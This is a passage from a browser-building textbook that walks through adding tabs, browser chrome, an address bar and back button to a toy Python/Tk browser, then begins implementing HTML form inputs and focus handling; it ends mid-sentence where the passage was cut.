If you’re anything like me, the next thing you tried after clicking on links is middle-clicking them to open in a new tab. Every browser now has tabbed browsing, and honestly it’s a little embarrassing that our little toy browser doesn’t.Back in the day, browser tabs were the feature that would convince friends and relatives to switch from IE 6 to Firefox.
Fundamentally, tabbed browsing means distinguishing between the browser itself and tabs that show individual web pages. The canvas the browser draws to, for example, is shared by all web pages, but the layout tree and display list are specific to one page. We need to tease these two types of things apart.
Here’s the plan: the Browser
class will store the window
and canvas, plus a list of Tab
objects, one per browser
tab. Everything else goes into a new Tab
class. Since the
Browser
stores the window and canvas, it handles all of the
events, sometimes forwarding it to the active tab.
Since the Tab
class is responsible for layout, styling,
and painting, the default style sheet moves to the Tab
constructor:
class Tab:
    def __init__(self):
        with open("browser.css") as f:
            self.default_style_sheet = CSSParser(f.read()).parse()
The load
, scrolldown
, click
,
and draw
methods also move to Tab
, since
that’s now where all web-page-specific data lives.
But since the Browser
controls the canvas and handles
events, it decides when rendering happens and which tab does the
drawing. After all, you only want one tab drawing its contents at a
time!Unless the browser implements multiple windows, of
course. So let’s remove the draw
calls from the
load
and scrolldown
methods, and in
draw
, let’s pass the canvas in as an argument:
class Tab:
    def draw(self, canvas):
        # ...
Let’s also make draw
not clear the screen. That should
be the Browser
’s job.
Now let’s turn to the Browser
class. It has to store a
list of tabs and an index into that list for the active tab:
class Browser:
    def __init__(self):
        # ...
        self.tabs = []
        self.active_tab = None
When it comes to user interaction, think of the Browser
as “active” and the Tab
as “passive”. It’s the job of the
Browser
to call into the tabs as appropriate. So the
Browser
handles all events:
class Browser:
    def __init__(self):
        self.window.bind("<Down>", self.handle_down)
        self.window.bind("<Button-1>", self.handle_click)
Since these events need page-specific information to resolve, these handler methods just forward the event to the active tab:
class Browser:
    def handle_down(self, e):
        self.tabs[self.active_tab].scrolldown()
        self.draw()

    def handle_click(self, e):
        self.tabs[self.active_tab].click(e.x, e.y)
        self.draw()
You’ll need to tweak the Tab
’s scrolldown
and click
methods:
- scrolldown
now takes no arguments (instead of an event object);
- click
now takes two coordinates (instead of an event object).
Finally, the Browser
’s draw
call also calls
into the active tab:
class Browser:
    def draw(self):
        self.canvas.delete("all")
        self.tabs[self.active_tab].draw(self.canvas)
This only draws the active tab, which is how tabs are supposed to work.
We’re basically done splitting Tab
from
Browser
, and after a refactor like this we need to test
things. To do that, we’ll need to create at least one tab, like
this:
class Browser:
    def load(self, url):
        new_tab = Tab()
        new_tab.load(url)
        self.active_tab = len(self.tabs)
        self.tabs.append(new_tab)
        self.draw()
Of course, we need a way for the user to switch tabs, create new ones, and so on. Let’s turn to that next.
Browser tabs first appeared in SimulBrowse, which was a kind of custom UI for the Internet Explorer engine. SimulBrowse (later renamed to NetCaptor) also had ad blocking and a private browsing mode. The old advertisements are a great read!
Real web browsers don’t just show web page contents—they’ve got
labels and icons and buttons.Oh my! This is called the browser
“chrome”;Yep, that
predates and inspired the name of Google’s Chrome browser.
all of this stuff is drawn by the browser to the same window as the page
contents, and it requires information about the browser as a whole (like
the list of all tabs), so it has to happen in the Browser
class.
Much like tabs, the browser chrome is going to generate a display list and then draw it to the canvas. However, unlike tabs, this display list will always be drawn at the top of the window and won’t be scrolled:
class Browser:
    def draw(self):
        # ...
        for cmd in self.paint_chrome():
            cmd.execute(0, self.canvas)
The paint_chrome
method constructs the display list for
the browser chrome; I’m just constructing and using it directly, instead
of storing it somewhere, because our browser will have pretty simple
chrome, meaning paint_chrome
will be fast. In a real
browser, it might be saved and only updated when the chrome changes.
First things first: we need to avoid drawing page contents to the part of the browser window where the tab bar goes. Let’s reserve some space for the browser chrome—100 pixels, say:
CHROME_PX = 100
Each tab needs to make sure not to draw to those pixels:
class Tab:
    def draw(self, canvas):
        for cmd in self.display_list:
            if cmd.top > self.scroll + HEIGHT - CHROME_PX: continue
            if cmd.bottom < self.scroll: continue
            cmd.execute(self.scroll - CHROME_PX, canvas)
There are still sometimes going to be halves of letters that stick out into the browser chrome, but we can hide them by just drawing over them:
class Browser:
    def paint_chrome(self):
        cmds = []
        cmds.append(DrawRect(0, 0, WIDTH, CHROME_PX, "white"))
        return cmds
You’ll also need to adjust scrolldown
to account for the
height of the page content now being
HEIGHT - CHROME_PX
:
class Tab:
    def scrolldown(self):
        max_y = max(self.document.height - (HEIGHT - CHROME_PX), 0)
        self.scroll = min(self.scroll + SCROLL_STEP, max_y)
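With some hypothetical numbers, the clamping behaves like this (a 600-pixel-tall window, 100 pixels of chrome, and an invented 2000-pixel-tall page):

```python
HEIGHT, CHROME_PX, SCROLL_STEP = 600, 100, 100
document_height = 2000  # hypothetical page height

# Only HEIGHT - CHROME_PX = 500 pixels of page are visible at a time,
# so the furthest we can scroll is 2000 - 500 = 1500.
max_y = max(document_height - (HEIGHT - CHROME_PX), 0)

scroll = 0
for _ in range(20):  # scroll down far more than the page allows
    scroll = min(scroll + SCROLL_STEP, max_y)
print(max_y, scroll)  # scrolling clamps at the bottom of the page
```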
To better separate the chrome from the page, let’s also add a border:
class Browser:
    def paint_chrome(self):
        # ...
        cmds.append(DrawRect(0, 0, WIDTH, CHROME_PX, "white"))
        cmds.append(DrawLine(
            0, CHROME_PX - 1, WIDTH, CHROME_PX - 1, "black", 1))
        # ...
The DrawLine
command draws a line of a given color and
thickness. It’s defined like so:
class DrawLine:
    def __init__(self, x1, y1, x2, y2, color, thickness):
        self.top = y1
        self.left = x1
        self.bottom = y2
        self.right = x2
        self.color = color
        self.thickness = thickness

    def execute(self, scroll, canvas):
        canvas.create_line(
            self.left, self.top - scroll,
            self.right, self.bottom - scroll,
            fill=self.color, width=self.thickness)
Let’s start drawing the chrome. First: the tab bar at the top of the browser window. I’ll keep it simple, but this is still going to require some tedious and mildly tricky geometry.
class Browser:
    def paint_chrome(self):
        # ...
        tabfont = get_font(20, "normal", "roman")
        for i, tab in enumerate(self.tabs):
            # ...
        # ...
Python’s enumerate
function lets you iterate over both
the indices and the contents of an array at the same time. Let’s make
each tab 80 pixels wide and 40 pixels tall. We’ll label each tab
something like “Tab 4” so we don’t have to deal with long tab titles
overlapping. And let’s leave 40 pixels on the left for a button that
adds a new tab. Thus, the i
th tab starts at x
position 40 + 80*i
and ends at 120 + 80*i
:
for i, tab in enumerate(self.tabs):
    name = "Tab {}".format(i)
    x1, x2 = 40 + 80 * i, 120 + 80 * i
For each tab, we need to create a border on the left and right and then draw the tab name:
for i, tab in enumerate(self.tabs):
    # ...
    cmds.append(DrawLine(x1, 0, x1, 40, "black", 1))
    cmds.append(DrawLine(x2, 0, x2, 40, "black", 1))
    cmds.append(DrawText(x1 + 10, 10, name, tabfont, "black"))
Finally, to identify which tab is the active tab, we’ve got to make that file folder shape with the current tab sticking up:
for i, tab in enumerate(self.tabs):
    # ...
    if i == self.active_tab:
        cmds.append(DrawLine(0, 40, x1, 40, "black", 1))
        cmds.append(DrawLine(x2, 40, WIDTH, 40, "black", 1))
The whole point of tab support is to have more than one tab around, and for that we need a button that creates a new tab. Let’s put that on the left of the tab bar, with a big plus in the middle:
class Browser:
    def paint_chrome(self):
        # ...
        buttonfont = get_font(30, "normal", "roman")
        cmds.append(DrawOutline(10, 10, 30, 30, "black", 1))
        cmds.append(DrawText(11, 0, "+", buttonfont, "black"))
Here the DrawOutline
command draws a rectangle’s border
instead of its inside. It’s defined like this:
class DrawOutline:
    def __init__(self, x1, y1, x2, y2, color, thickness):
        self.top = y1
        self.left = x1
        self.bottom = y2
        self.right = x2
        self.color = color
        self.thickness = thickness

    def execute(self, scroll, canvas):
        canvas.create_rectangle(
            self.left, self.top - scroll,
            self.right, self.bottom - scroll,
            width=self.thickness,
            outline=self.color)
The next step is clicking on tabs to switch between them. That has to
happen in the Browser
class, since it’s the
Browser
that stores which tab is active. So let’s go to the
handle_click
method and add a branch for clicking on the
browser chrome:
class Browser:
    def handle_click(self, e):
        if e.y < CHROME_PX:
            # ...
        else:
            self.tabs[self.active_tab].click(e.x, e.y - CHROME_PX)
        self.draw()
When the user clicks on the browser chrome (the if
branch), the browser handles it directly, but if the click is on the
page content (the else
branch) it is still forwarded to the
active tab, subtracting CHROME_PX
to fix up the
coordinates.
Within the browser chrome, the tab bar takes up the top 40 pixels,
starting 40 pixels from the left. Remember that the i
th tab
has x1 = 40 + 80*i
; we need to solve that equation for
i
to figure out which tab the user clicked on:
if e.y < CHROME_PX:
    if 40 <= e.x < 40 + 80 * len(self.tabs) and 0 <= e.y < 40:
        self.active_tab = int((e.x - 40) / 80)
Note the first condition on the if
statement: it makes
sure that if there are only two tabs, the user can’t switch to the
“third tab” by clicking in the blank space where that tab would go. That
would be bad, because then later references to “the active tab” would
error out.
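Here's that arithmetic checked on a few example click positions (the pixel values are the layout constants from this section):

```python
# Tab i spans x1 = 40 + 80*i through x2 = 120 + 80*i, so inverting
# that for a click's x coordinate gives the tab index.
def tab_at(x):
    return int((x - 40) / 80)

print(tab_at(40))   # 0: left edge of the first tab
print(tab_at(119))  # 0: still inside the first tab
print(tab_at(120))  # 1: first pixel of the second tab
print(tab_at(250))  # 2
```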
Let’s also implement the button that adds a new tab. We need it to test tab switching, anyway:
if e.y < CHROME_PX:
    # ...
    elif 10 <= e.x < 30 and 10 <= e.y < 30:
        self.load(URL("https://browser.engineering/"))
That’s an appropriate “new tab” page, don’t you think? Anyway, you should now be able to load multiple tabs, scroll and click around them independently, and switch tabs by clicking on them.
Google Chrome 1.0 was accompanied by a comic book to pitch its features. There’s a whole chapter about its design ideas and user interface features, many of which stuck around. Even this book’s browser has tabs on top, for example!
Now that we are navigating between pages all the time, it’s easy to get a little lost and forget what web page you’re looking at. An address bar that shows the current URL would help a lot.
class Browser:
    def paint_chrome(self):
        # ...
        cmds.append(DrawOutline(40, 50, WIDTH - 10, 90, "black", 1))
        url = str(self.tabs[self.active_tab].url)
        cmds.append(DrawText(55, 55, url, buttonfont, "black"))
Here str
is a built-in Python function that we can
override to correctly convert URL
objects to strings:
class URL:
    def __str__(self):
        port_part = ":" + str(self.port)
        if self.scheme == "https" and self.port == 443:
            port_part = ""
        if self.scheme == "http" and self.port == 80:
            port_part = ""
        return self.scheme + "://" + self.host + port_part + self.path
I think the extra logic to hide port numbers makes the URLs more tidy.
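To check the port-hiding behavior in isolation, here's the same __str__ on a stripped-down class that stores only the fields __str__ reads. The constructor signature is invented for this sketch; the book's URL parses a URL string instead:

```python
class MiniURL:
    # holds just the fields __str__ needs; not the book's real constructor
    def __init__(self, scheme, host, port, path):
        self.scheme, self.host = scheme, host
        self.port, self.path = port, path

    def __str__(self):
        port_part = ":" + str(self.port)
        if self.scheme == "https" and self.port == 443:
            port_part = ""
        if self.scheme == "http" and self.port == 80:
            port_part = ""
        return self.scheme + "://" + self.host + port_part + self.path

print(MiniURL("http", "example.org", 80, "/"))      # default port hidden
print(MiniURL("https", "example.org", 8443, "/x"))  # unusual port shown
```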
To keep up appearances, the address bar needs a “back” button nearby. I’ll start by drawing the back button itself:
class Browser:
    def paint_chrome(self):
        # ...
        cmds.append(DrawOutline(10, 50, 35, 90, "black", 1))
        cmds.append(DrawText(15, 50, "<", buttonfont, "black"))
So what happens when that button is clicked? Well, that tab
goes back. Other tabs are not affected. So the Browser
has
to invoke some method on the current tab to go back:
class Browser:
    def handle_click(self, e):
        if e.y < CHROME_PX:
            # ...
            elif 10 <= e.x < 35 and 50 <= e.y < 90:
                self.tabs[self.active_tab].go_back()
            # ...
For the active tab to “go back”, it needs to store a “history” of which pages it’s visited before:
class Tab:
    def __init__(self):
        # ...
        self.history = []
The history grows every time we go to a new page:
class Tab:
    def load(self, url):
        self.history.append(url)
        # ...
Going back uses that history. You might think to write this:
class Tab:
    def go_back(self):
        if len(self.history) > 1:
            self.load(self.history[-2])
That’s almost correct, but it doesn’t work if you click the back
button twice, because load
adds to the history. Instead, we
need to do something more like this:
class Tab:
    def go_back(self):
        if len(self.history) > 1:
            self.history.pop()
            back = self.history.pop()
            self.load(back)
Now, going back shrinks the history and clicking on links grows it, as it should.
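The interplay between load and go_back is easy to check with a stripped-down tab that tracks only its history (URLs are plain strings here, for illustration):

```python
class MiniTab:
    # only the history-related parts of Tab
    def __init__(self):
        self.history = []

    def load(self, url):
        self.history.append(url)

    def go_back(self):
        if len(self.history) > 1:
            self.history.pop()          # drop the current page...
            back = self.history.pop()   # ...and the page we're going to,
            self.load(back)             # because load() re-appends it

tab = MiniTab()
for url in ["a", "b", "c"]:
    tab.load(url)
tab.go_back()
print(tab.history)  # ['a', 'b']
tab.go_back()
print(tab.history)  # ['a'] -- clicking back twice works
```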
So we’ve now got a pretty good web browser for reading this very book: you can click links, browse around, and even have multiple chapters open simultaneously for cross-referencing things. But it’s a little hard to visit any other website…
A browser’s navigation history can contain sensitive information
about which websites a user likes visiting, so keeping it secure is
important. Surprisingly, this is pretty hard, because CSS features like
the :visited
selector can be used to check
whether a URL has been visited before.
One way to go to another page is by clicking on a link. But most browsers also allow you to type into the address bar to visit a new URL, if you happen to know the URL off-hand.
Take a moment to notice the complex ritual of typing in an address:
These steps suggest that the browser stores the contents of the
address bar separately from the url
field, and also that
there’s some state to say whether you’re currently typing into the
address bar. Let’s call the contents address_bar
and the
state focus
:
class Browser:
    def __init__(self):
        # ...
        self.focus = None
        self.address_bar = ""
Clicking on the address bar should set focus
and
clicking outside it should clear focus
:
class Browser:
    def handle_click(self, e):
        self.focus = None
        if e.y < CHROME_PX:
            # ...
            elif 50 <= e.x < WIDTH - 10 and 50 <= e.y < 90:
                self.focus = "address bar"
                self.address_bar = ""
            # ...
Note that clicking on the address bar also clears the address bar contents. That’s not quite what a browser does, but it’s pretty close, and lets us skip adding text selection.
Now, when we draw the address bar, we need to check whether to draw the current URL or the currently-typed text:
class Browser:
    def paint_chrome(self):
        # ...
        if self.focus == "address bar":
            cmds.append(DrawText(55, 55, self.address_bar, buttonfont, "black"))
        else:
            url = str(self.tabs[self.active_tab].url)
            cmds.append(DrawText(55, 55, url, buttonfont, "black"))
When the user is typing in the address bar, let’s also draw a cursor. Making states (like focus) visible on the screen (like with the cursor) makes the software easier to use:
        if self.focus == "address bar":
            # ...
            w = buttonfont.measure(self.address_bar)
            cmds.append(DrawLine(55 + w, 55, 55 + w, 85, "black", 1))
Next, when the address bar is focused, we need to support typing in a
URL. In Tk, you can bind to <Key>
to capture all key
presses. The event object’s char
field contains the
character the user typed:
class Browser:
    def __init__(self):
        # ...
        self.window.bind("<Key>", self.handle_key)

    def handle_key(self, e):
        if len(e.char) == 0: return
        if not (0x20 <= ord(e.char) < 0x7f): return
        if self.focus == "address bar":
            self.address_bar += e.char
            self.draw()
This handle_key
handler starts with some conditions:
<Key>
fires for every key press, not just regular
letters, so we want to ignore cases where no character is typed (a
modifier key is pressed) or the character is outside the ASCII range
(which can represent the arrow keys or function keys). After we modify
address_bar
we also need to call draw()
so
that the new letters actually show up.
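The filtering logic can be tested on its own; here's a hypothetical helper (not part of the browser code) mirroring those two conditions:

```python
# Hypothetical helper mirroring handle_key's filtering conditions.
def is_printable_ascii(char):
    if len(char) == 0: return False                   # modifier keys yield no char
    if not (0x20 <= ord(char) < 0x7f): return False   # arrows, escape, etc.
    return True
```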
Finally, once the new URL is entered, we need to handle the “Enter”
key, which Tk calls <Return>
, and actually send the
browser to the new address:
class Browser:
    def __init__(self):
        # ...
        self.window.bind("<Return>", self.handle_enter)

    def handle_enter(self, e):
        if self.focus == "address bar":
            self.tabs[self.active_tab].load(URL(self.address_bar))
            self.focus = None
            self.draw()
So there—after a long chapter, you can now unwind a bit by surfing the web.
Text editing is surprisingly complex, and can be pretty tricky to implement well, especially for languages other than English. And nowadays URLs can be written in any language, though modern browsers restrict this somewhat for security reasons.
It’s been a lot of work just to handle links! We had to:
Now just imagine all the features you can add to your browser!
The complete set of functions, classes, and methods in our browser should now look something like this:
WIDTH
HEIGHT
HSTEP
VSTEP
SCROLL_STEP
FONTS
def get_font(size, weight, slant)
class Text:
def __init__(text, parent)
def __repr__()
class Element:
def __init__(tag, attributes, parent)
def __repr__()
def print_tree(node, indent)
class HTMLParser:
def __init__(body)
def parse()
def get_attributes(text)
def add_text(text)
SELF_CLOSING_TAGS
def add_tag(tag)
HEAD_TAGS
def implicit_tags(tag)
def finish()
BLOCK_ELEMENTS
class DrawRect:
def __init__(x1, y1, x2, y2, color)
def execute(scroll, canvas)
def __repr__()
class CSSParser:
def __init__(s)
def whitespace()
def literal(literal)
def word()
def pair()
def ignore_until(chars)
def body()
def selector()
def parse()
class TagSelector:
def __init__(tag)
def matches(node)
def __repr__()
class DescendantSelector:
def __init__(ancestor, descendant)
def matches(node)
def __repr__()
INHERITED_PROPERTIES
def style(node, rules)
def cascade_priority(rule)
class DrawText:
def __init__(x1, y1, text, font, color)
def execute(scroll, canvas)
def __repr__()
class URL:
def __init__(url)
def request()
def resolve(url)
def __str__()
def tree_to_list(tree, list)
class BlockLayout:
def __init__(node, parent, previous)
def token(tok)
def word(node, word)
def flush()
def recurse(node)
def open_tag(tag)
def close_tag(tag)
def layout()
def layout_mode()
def paint(display_list)
def get_font(node)
def __repr__()
def new_line()
class DocumentLayout:
def __init__(node)
def layout()
def paint(display_list)
def __repr__()
class LineLayout:
def __init__(node, parent, previous)
def layout()
def paint(display_list)
def __repr__()
class TextLayout:
def __init__(node, word, parent, previous)
def layout()
def paint(display_list)
class DrawLine:
def __init__(x1, y1, x2, y2, color, thickness)
def execute(scroll, canvas)
def __repr__()
class DrawOutline:
def __init__(x1, y1, x2, y2, color, thickness)
def execute(scroll, canvas)
def __repr__()
CHROME_PX
class Tab:
def __init__()
def load(url)
def draw(canvas)
def scrolldown()
def click(x, y)
def go_back()
def __repr__()
class Browser:
def __init__()
def handle_down(e)
def handle_click(e)
def handle_key(e)
def handle_enter(e)
def load(url)
def paint_chrome()
def draw()
if __name__ == "__main__"
If you run it, it should look something like this:
Backspace: Add support for the backspace key when typing in the address bar. Honestly, do this exercise just for your sanity.
Middle-click: Add support for middle-clicking on a link
(Button-2
) to open it in a new tab. You might need a mouse
to test this easily.
Forward: Add a forward button, which should undo the back button. If the most recent navigation action wasn’t a back button, the forward button shouldn’t do anything. Draw it in gray in that case, so the user isn’t stuck wondering why it doesn’t work. Also draw the back button in gray if there’s nowhere to go back to.
Fragments: URLs can contain a fragment, which comes
at the end of a URL and is separated from the path by a hash sign
#
. When the browser navigates to a URL with a fragment, it
should scroll the page so that the element with that identifier is at
the top of the screen. Also, implement fragment links: relative URLs
that begin with a #
don’t load a new page, but instead
scroll the element with that identifier to the top of the screen. The
table of contents on this page uses fragment links.
Search: If the user types something that’s not a
URL into the address bar, make your browser automatically search for it
with a search engine. This usually means going to a special URL. For
example, you can search Google by going to
https://google.com/search?q=QUERY
, where QUERY
is the search query with every space replaced by a +
sign.Actually, you need
to escape lots of
punctuation characters in these “query strings”, but that’s kind of
orthogonal to this address bar search feature.
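For the space-to-plus replacement, Python's urllib.parse.quote_plus handles it (and percent-encodes other punctuation too); a quick sketch:

```python
import urllib.parse

# Build a search URL from a free-form query; quote_plus turns spaces
# into "+" and percent-encodes other special characters.
query = "web browser engineering"
search_url = "https://google.com/search?q=" + urllib.parse.quote_plus(query)
```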
Visited Links: In real browsers, links you’ve visited before are usually purple. Implement that feature. You’ll need to store the set of visited URLs, annotate the corresponding HTML elements, and check those annotations when drawing the text.Real browsers support special pseudo-class selectors that select all visited links, which you could implement if you want.
Bookmarks: Implement basic bookmarks. Add a button
to the browser chrome; clicking it should bookmark the page. When you’re
looking at a bookmarked page, that bookmark button should look different
(maybe yellow?) to remind the user that the page is bookmarked, and
clicking it should un-bookmark it. Add a special web page,
about:bookmarks
, for viewing the list of bookmarks.
Cursor: Make the left and right arrow keys move the text cursor around the address bar when it is focused. Pressing the backspace key should delete the character before the cursor, and typing other keys should add characters at the cursor. (Remember that the cursor can be before the first character or after the last!)
Multiple windows: Add support for multiple browser windows in
addition to tabs. This will require keeping track of multiple Tk windows
and canvases and grouping tabs by their containing window. You’ll also
need some way to create a new window, perhaps with a keypress such as
Ctrl+N
.
So far, our browser has seen the web as read only—but when you post on Facebook, fill out a survey, or search Google, you’re sending information to servers as well as receiving information from them. In this chapter, we’ll start to transform our browser into a platform for web applications by building out support for HTML forms, the simplest way for a browser to send information to a server.
HTML forms have a couple of moving pieces.
First, in HTML, there is a form
element, which contains
input
elements,There are other elements similar to input
,
such as select
and textarea
. They work
similarly enough; they just represent different kinds of user controls,
like dropdowns and multi-line inputs. which in turn can be
edited by the user. So a form might look like this:
<form action="/submit" method="post">
    <p>Name: <input name=name value=1></p>
    <p>Comment: <input name=comment value=2></p>
    <p><button>Submit!</button></p>
</form>
This form contains two text entry boxes called name
and
comment
. When the user goes to this page, they can click on
those boxes to edit their values. Then, when they click the button at
the end of the form, the browser collects all of the name/value pairs
and bundles them into an HTTP POST
request (as indicated by
the method
attribute), sent to the URL given by the
form
element’s action
attribute, with the
usual rules of relative URLs—so in this case, /submit
. The
POST
request looks like this:
POST /submit HTTP/1.0
Host: example.org
Content-Length: 16
name=1&comment=2
In other words, it’s a lot like the regular GET
requests
we’ve already seen, except that it has a body—you’ve already seen HTTP
responses with bodies, but requests can have them too. Note the
Content-Length
header; it’s mandatory for POST
requests. The server responds to this request with a web page, just like
normal, and the browser then does everything it normally does.
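To make the wire format concrete, here's how that exact request could be assembled as a Python string (a sketch for illustration; our browser builds it inside URL.request later in this chapter):

```python
# Assemble the example POST request by hand.
body = "name=1&comment=2"
request = "POST /submit HTTP/1.0\r\n"
request += "Host: example.org\r\n"
# Content-Length counts bytes of the body, and is mandatory for POST.
request += "Content-Length: {}\r\n".format(len(body.encode("utf8")))
request += "\r\n" + body
```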
Implementing forms requires extending many parts of the browser, from
implementing HTTP POST
through new layout objects that draw
input
elements to handling button clicks. That makes it a
great starting point for transforming our toy browser into an
application platform, our goal for these next few chapters. Let’s get
started implementing it all!
HTML forms were first standardized in HTML+, which also proposed tables, mathematical equations, and text that wraps around images. Amazingly, all three of these technologies survive, but in totally different standards: tables in RFC 1942, equations in MathML, and floating images in CSS 1.0.
First, let’s draw the input areas that the user will type into.Most applications use OS
libraries to draw input areas, so that those input areas look like other
applications on that OS. But browsers need a lot of control over
application styling, so they often draw their own input
areas. Input areas are inline content, laid out in lines
next to text. So to support inputs we’ll need a new kind of layout
object, which I’ll call InputLayout
. We can copy
TextLayout
and use it as a template, though we’ll need to
make some quick edits.
First, there’s no word
argument to
InputLayout
s:
class InputLayout:
    def __init__(self, node, parent, previous):
        self.node = node
        self.children = []
        self.parent = parent
        self.previous = previous
Second, input
elements usually have a fixed width:
INPUT_WIDTH_PX = 200

class InputLayout:
    def layout(self):
        # ...
        self.width = INPUT_WIDTH_PX
        # ...
The input
and button
elements need to be
visually distinct so the user can find them easily. Our browser’s
styling capabilities are limited, so let’s use background color to do
that:
input {font-size: 16px; font-weight: normal; font-style: normal;
background-color: lightblue;
}
button {font-size: 16px; font-weight: normal; font-style: normal;
background-color: orange;
}
When the browser paints an InputLayout
it needs to draw
the background:
class InputLayout:
    def paint(self, display_list):
        bgcolor = self.node.style.get("background-color",
                                      "transparent")
        if bgcolor != "transparent":
            x2, y2 = self.x + self.width, self.y + self.height
            rect = DrawRect(self.x, self.y, x2, y2, bgcolor)
            display_list.append(rect)
It then needs to get the input element’s text contents:
class InputLayout:
    def paint(self, display_list):
        # ...
        if self.node.tag == "input":
            text = self.node.attributes.get("value", "")
        elif self.node.tag == "button":
            if len(self.node.children) == 1 and \
               isinstance(self.node.children[0], Text):
                text = self.node.children[0].text
            else:
                print("Ignoring HTML contents inside button")
                text = ""
Note that <button>
elements can in principle
contain complex HTML, not just a text node. I’m having the browser print
a warning and skip the text in that case.There’s an exercise on this.
Finally, we draw that text:
class InputLayout:
    def paint(self, display_list):
        # ...
        color = self.node.style["color"]
        display_list.append(
            DrawText(self.x, self.y, text, self.font, color))
By this point in the book, you’ve seen many layout objects, so I’m glossing over these changes. The point is that new layout objects are one standard way to extend the browser.
We now need to create some InputLayout
s, which we can do
in BlockLayout
:
class BlockLayout:
    def recurse(self, node):
        if isinstance(node, Text):
            # ...
        else:
            if node.tag == "br":
                self.new_line()
            elif node.tag == "input" or node.tag == "button":
                self.input(node)
            else:
                for child in node.children:
                    self.recurse(child)
Note that I don’t recurse into button
elements, because
the button
element draws its own contents.Though you’ll need to do this
differently for one of the exercises below. Since
input
elements are self-closing, they never have
children.
Finally, this new input
method is similar to the
text
method, creating a new layout object and adding it to
the current line:It’s so
similar in fact that they only differ in the w
variable
definition, and the need to loop over words. I’ll resist the temptation
to refactor this code until we get to Chapter
15.
class BlockLayout:
    def input(self, node):
        w = INPUT_WIDTH_PX
        if self.cursor_x + w > self.width:
            self.new_line()
        line = self.children[-1]
        input = InputLayout(node, line, self.previous_word)
        line.children.append(input)
        self.previous_word = input
        font = self.get_font(node)
        self.cursor_x += w + font.measure(" ")
But actually, there are a couple more complications due to the way we
decided to resolve the block-mixed-with-inline-siblings problem (see Chapter 5). One is that if there are
no children for a node, we assume it’s a block element. But
<input>
elements don’t have children, yet must have
inline layout or else they won’t draw correctly. Likewise, a
<button>
does have children, but they are treated
specially.This situation
is specific to these elements in our browser, but only because they are
the only elements with special painting behavior within an inline
context. These are also two examples of atomic
inlines.
We can fix that with this change to layout_mode
:
class BlockLayout:
    def layout_mode(self):
        if isinstance(self.node, Text):
            return "inline"
        elif self.node.children:
            for child in self.node.children:
                if isinstance(child, Text): continue
                if child.tag in BLOCK_ELEMENTS:
                    return "block"
            return "inline"
        elif self.node.tag == "input":
            return "inline"
        else:
            return "block"
The second problem is that, again due to having block siblings,
sometimes an InputLayout
will end up wrapped in a
BlockLayout
that refers to the <input>
or <button>
node. But both BlockLayout
and InputLayout
have a paint
method, which
means we’re painting the node twice. We can fix that with some simple
logic to skip painting them via BlockLayout
in this
case:See also the
footnote earlier about how atomic inlines are often special in these
kinds of ways. It’s worth noting that there are various other ways that
our browser does not fully implement all the complexities of inline
painting—one example is that it does not correctly paint nested inlines
with different background colors.
class BlockLayout:
    # ...
    def paint(self, display_list):
        # ...
        is_atomic = not isinstance(self.node, Text) and \
            (self.node.tag == "input" or self.node.tag == "button")
        if not is_atomic:
            if bgcolor != "transparent":
                x2, y2 = self.x + self.width, self.y + self.height
                rect = DrawRect(self.x, self.y, x2, y2, bgcolor)
                display_list.append(rect)
With these changes the browser should now draw input
and
button
elements as blue and orange rectangles.
The reason buttons surround their contents but input areas don’t is
that a button can contain images, styled text, or other content. In a
real browser, that relies on the inline-block
display mode: a way of putting a block element into a line of text.
There’s also an older <input type=button>
syntax more
similar to text inputs.
We’ve got input
elements rendering, but you can’t edit
their contents yet. But of course that’s the whole point! So let’s make
input
elements work like the address bar does—clicking on
one will clear it and let you type into it.
Clearing is easy, another case inside Tab
’s
click
method:
class Tab:
    def click(self, x, y):
        while elt:
            # ...
            elif elt.tag == "input":
                elt.attributes["value"] = ""
            # ...
However, if you try this, you’ll notice that clicking does not
actually clear the input
element. That’s because the code
above updates the HTML tree—but we need to update the layout tree and
then the display list for the change to appear on the screen.
Right now, the layout tree and display list are computed in
load
, but we don’t want to reload the whole page; we just
want to redo the styling, layout, paint and draw phases. Together these
are called rendering. So let’s extract these phases into a new
Tab
method, render
:
class Tab:
    def load(self, url, body=None):
        # ...
        self.render()

    def render(self):
        style(self.nodes, sorted(self.rules, key=cascade_priority))
        self.document = DocumentLayout(self.nodes)
        self.document.layout()
        self.display_list = []
        self.document.paint(self.display_list)
For this code to work, you’ll also need to change nodes
and rules
from local variables in the load
method to new fields on a Tab
. Note that styling moved from
load
to render
, but downloading the style
sheets didn’t—we don’t re-download the style sheetsActually, some changes to the
web page could delete existing link
nodes or create new
ones. Real browsers respond to this correctly, either removing the rules
corresponding to deleted link
nodes or downloading new
style sheets when new link
nodes are created. This is
tricky to get right, and typing into an input area definitely can’t make
such changes, so let’s skip this in our browser. every
time you type!
Now when we click an input
element and clear its
contents, we can call render
to redraw the page with the
input
cleared:
class Tab:
    def click(self, x, y):
        while elt:
            # ...
            elif elt.tag == "input":
                elt.attributes["value"] = ""
                return self.render()
So that’s clicking in an input
area. But typing is
harder. Think back to how we implemented the
address bar: we added a focus
field that remembered
what we clicked on so we could later send it our key presses. We need
something like that focus
field for input areas, but it’s
going to be more complex because the input areas live inside a
Tab
, not inside the Browser
.
Naturally, we will need a focus
field on each
Tab
, to remember which text entry (if any) we’ve recently
clicked on:
class Tab:
    def __init__(self):
        # ...
        self.focus = None
Now when we click on an input element, we need to set
focus
(and clear focus if nothing was found to focus
on):
class Tab:
    def click(self, x, y):
        self.focus = None
        # ...
        while elt:
            # ...
            elif elt.tag == "input":
                self.focus = elt
                # ...
But remember that keyboard input isn’t handled by the
Tab
—it’s handled by the Browser
. So how does
the Browser
even know when keyboard events should be sent
to the Tab
? The Browser
has to remember that
in its own focus
field!
In other words, when you click on the web page, the
Browser
updates its focus
field to remember
that the user is interacting with the page, not the browser
interface:
class Browser:
    def handle_click(self, e):
        if e.y < CHROME_PX:
            self.focus = None
            # ...
        else:
            self.focus = "content"
            # ...
        self.draw()
The if
branch that corresponds to clicks in the browser
interface unsets focus
by default, but some existing code
in that branch will set focus
to "address bar"
if the user actually clicked in the address bar.
When a key press happens, the Browser
sends it either to
the address bar or calls the active tab’s keypress
method:
class Browser:
    def handle_key(self, e):
        # ...
        elif self.focus == "content":
            self.tabs[self.active_tab].keypress(e.char)
            self.draw()
That keypress
method then uses the tab’s
focus
field to put the character in the right text
entry:
class Tab:
    def keypress(self, char):
        if self.focus:
            self.focus.attributes["value"] += char
            self.render()
Note that here we call render
instead of
draw
, because we’ve modified the web page and thus need to
regenerate the display list instead of just redrawing it to the
screen.
Hierarchical focus handling is an important pattern for combining
graphical widgets; in a real browser, where web pages can be embedded
into one another with iframe
s,The iframe
